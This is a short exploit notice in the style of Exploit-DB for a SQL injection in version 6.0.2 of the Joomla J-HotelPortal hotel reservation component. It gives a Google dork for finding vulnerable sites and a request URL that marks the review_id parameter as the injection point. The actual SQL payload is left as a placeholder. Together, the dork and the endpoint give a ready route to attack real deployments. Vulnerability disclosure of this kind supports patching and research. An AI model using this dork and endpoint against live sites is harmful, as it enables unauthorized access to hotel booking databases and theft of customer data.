18 lines
No EOL
679 B
Text
18 lines
No EOL
679 B
Text
# # # # #
|
|
# Exploit Title: Joomla! Component J-HotelPortal v6.0.2 - SQL Injection
|
|
# Google Dork: inurl:index.php?option=com_jhotelreservation
|
|
# Date: 21.02.2017
|
|
# Vendor Homepage: http://www.cmsjunkie.com/
|
|
# Software Buy: http://www.cmsjunkie.com/joomla-hotel-portal
|
|
# Demo: http://hoteldemo.cmsjunkie.com/j3/portal/
|
|
# Version: 6.0.2
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[@]ihsan[.]net
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/index.php?option=com_jhotelreservation&tmpl=component&task=hotelratings.printRating&view=hotelratings&review_id=[SQL]
|
|
# Etc...
|
|
# # # # # |